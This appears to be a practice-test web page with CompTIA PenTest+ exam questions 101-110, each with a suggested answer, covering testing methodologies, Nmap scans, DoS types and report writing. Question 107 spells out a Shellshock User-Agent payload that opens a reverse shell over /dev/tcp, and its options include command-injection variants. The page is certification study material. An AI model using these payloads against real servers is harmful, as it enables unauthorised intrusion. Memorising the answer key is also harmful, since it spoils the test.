ExamGecko
Search Search Login
Home Home / CompTIA / PT0-002

CompTIA PT0-002 Practice Test - Questions Answers, Page 11

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
During an engagement, a junior penetration tester found a multihomed host that led to an unknown network segment. The penetration tester ran a port scan against the network segment, which caused an outage at the customer's factory. Which of the following documents should the junior penetration tester most likely follow to avoid this issue in the future?
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets. INSTRUCTIONS Select the appropriate answer(s), given the output from each section. Output 1
A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
Given the following user-supplied data: www.comptia.com/info.php?id=1 AND 1=1 Which of the following attack techniques is the penetration tester likely implementing?
A penetration tester is reviewing the logs of a proxy server and discovers the following URLs: https://test.comptia.com/profile.php?userid=1546 https://test.cpmptia.com/profile.php?userid=5482 https://test.comptia.com/profile.php?userid=3618 Which of the following types of vulnerabilities should be remediated?
A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

Question 101

Report
Export
Collapse

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

Pre-engagement interaction (scoping and ROE)

Intelligence gathering (reconnaissance)

Threat modeling

Vulnerability analysis

Exploitation and post exploitation

Reporting

Which of the following methodologies does the client use?

A.
OWASP Web Security Testing Guide
A.
OWASP Web Security Testing Guide
Answers
B.
PTES technical guidelines
B.
PTES technical guidelines
Answers
C.
NIST SP 800-115
C.
NIST SP 800-115
Answers
D.
OSSTMM
D.
OSSTMM
Answers
Suggested answer: B

Explanation:

Reference: https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/

Question 102

Report
Export
Collapse

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap -O -A -sS -p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

A.
A firewall or IPS blocked the scan.
A.
A firewall or IPS blocked the scan.
Answers
B.
The penetration tester used unsupported flags.
B.
The penetration tester used unsupported flags.
Answers
C.
The edge network device was disconnected.
C.
The edge network device was disconnected.
Answers
D.
The scan returned ICMP echo replies.
D.
The scan returned ICMP echo replies.
Answers
Suggested answer: A

Explanation:

Reference: https://phoenixnap.com/kb/nmap-scan-open-ports

Question 103

Report
Export
Collapse

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

A.
ROE
A.
ROE
Answers
B.
SLA
B.
SLA
Answers
C.
MSA
C.
MSA
Answers
D.
NDA
D.
NDA
Answers
Suggested answer: D

Question 104

Report
Export
Collapse

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

A.
nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
A.
nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
Answers
B.
nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
B.
nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
Answers
C.
nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
C.
nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
Answers
D.
nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
D.
nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
Answers
Suggested answer: C

Question 105

Report
Export
Collapse

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

A.
Smurf
A.
Smurf
Answers
B.
Ping flood
B.
Ping flood
Answers
C.
Fraggle
C.
Fraggle
Answers
D.
Ping of death
D.
Ping of death
Answers
Suggested answer: C

Explanation:

Fraggle attack is same as a Smurf attack but rather than ICMP, UDP protocol is used. The prevention of these attacks is almost identical to Fraggle attack.

Ref: https://www.okta.com/identity-101/fraggle-attack/

Question 106

Report
Export
Collapse

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

A.
A quick description of the vulnerability and a high-level control to fix it
A.
A quick description of the vulnerability and a high-level control to fix it
Answers
B.
Information regarding the business impact if compromised
B.
Information regarding the business impact if compromised
Answers
C.
The executive summary and information regarding the testing company
C.
The executive summary and information regarding the testing company
Answers
D.
The rules of engagement from the assessment
D.
The rules of engagement from the assessment
Answers
Suggested answer: A

Explanation:

The systems administrator and the technical stuff would be more interested in the technical aspect of the findings

Question 107

Report
Export
Collapse

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":

"text/html,application/xhtml+xml,application/xml"}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.
exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":"text/html,application/xhtml+xml,application/xml"}
A.
exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":"text/html,application/xhtml+xml,application/xml"}
Answers
B.
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept":"text/html,application/xhtml+xml,application/xml"}
B.
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept":"text/html,application/xhtml+xml,application/xml"}
Answers
C.
exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}
C.
exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}
Answers
D.
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}
D.
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}
Answers
Suggested answer: A

Question 108

Report
Export
Collapse

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

A.
NIST SP 800-53
A.
NIST SP 800-53
Answers
B.
OWASP Top 10
B.
OWASP Top 10
Answers
C.
MITRE ATT&CK framework
C.
MITRE ATT&CK framework
Answers
D.
PTES technical guidelines
D.
PTES technical guidelines
Answers
Suggested answer: C

Explanation:

Reference: https://digitalguardian.com/blog/what-mitre-attck-framework

Question 109

Report
Export
Collapse

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

A.
HTTPS communication
A.
HTTPS communication
Answers
B.
Public and private keys
B.
Public and private keys
Answers
C.
Password encryption
C.
Password encryption
Answers
D.
Sessions and cookies
D.
Sessions and cookies
Answers
Suggested answer: D

Question 110

Report
Export
Collapse

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

A.
OpenVAS
A.
OpenVAS
Answers
B.
Nikto
B.
Nikto
Answers
C.
SQLmap
C.
SQLmap
Answers
D.
Nessus
D.
Nessus
Answers
Suggested answer: C

Explanation:

Reference: https://phoenixnap.com/blog/best-penetration-testing-tools

Total 422 questions
Go to page: of 43
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms